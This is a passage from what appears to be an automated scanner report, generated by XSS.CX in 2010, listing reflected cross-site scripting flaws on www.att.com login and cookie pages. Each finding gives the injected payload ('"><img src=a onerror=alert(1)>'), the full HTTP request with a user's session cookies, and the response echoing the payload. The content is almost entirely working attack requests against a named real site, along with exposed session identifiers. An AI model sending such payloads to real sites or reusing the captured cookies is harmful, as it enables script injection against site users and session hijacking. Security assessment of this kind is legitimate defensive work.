GET /olam/jsp/tiles/common_includesd3f64"><img%20src%3da%20onerror%3dalert(1)>22c2a5fbd8d/cGateCookie.jsp?userType= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221,"cp":{"ctn":"","customer_type":"current","user_type":"UVERSE"}}; fsr.a=1292775474876

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9112
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:45 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A166101E0B8C100B771FDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tiles/common_includesd3f64"><img src=a onerror=alert(1)>22c2a5fbd8d/cGateCookie.jsp">
...[SNIP]...

1.48. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b35"><img%20src%3da%20onerror%3dalert(1)>e05f84a9a88 was submitted in the REST URL parameter 5. This input was echoed as 65b35"><img src=a onerror=alert(1)>e05f84a9a88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tiles/common_includes/cGateCookie.jsp65b35"><img%20src%3da%20onerror%3dalert(1)>e05f84a9a88?userType= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221,"cp":{"ctn":"","customer_type":"current","user_type":"UVERSE"}}; fsr.a=1292775474876

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9112
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:52 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A5F379000B8C100B774EDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tiles/common_includes/cGateCookie.jsp65b35"><img src=a onerror=alert(1)>e05f84a9a88">
...[SNIP]...

1.49. https://www.att.com/olam/loginAction.olamexecute [REST URL parameter 2] previous

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/loginAction.olamexecute

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe26c"><img%20src%3da%20onerror%3dalert(1)>2342459f2b0 was submitted in the REST URL parameter 2. This input was echoed as fe26c"><img src=a onerror=alert(1)>2342459f2b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/loginAction.olamexecutefe26c"><img%20src%3da%20onerror%3dalert(1)>2342459f2b0?customerType=U HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: http://www.wireless.att.com/accounts/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001265662746; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; TLTHID=7E8300B20B8B100B6CA9C257D8903D6F; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9094
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:24:24 GMT
Connection: keep-alive
Set-Cookie: TLTHID=713EF95A0B8C100B4E63F30A9563D2C3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=yQtZNTxY0Q4dlLp4Jz9VBm0T8WSGhGGGRgNK73kM2StJflRt0Hp4!79862489; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/loginAction.olamexecutefe26c"><img src=a onerror=alert(1)>2342459f2b0">
...[SNIP]...

Report generated by XSS.CX at Sun Dec 19 11:46:03 CST 2010.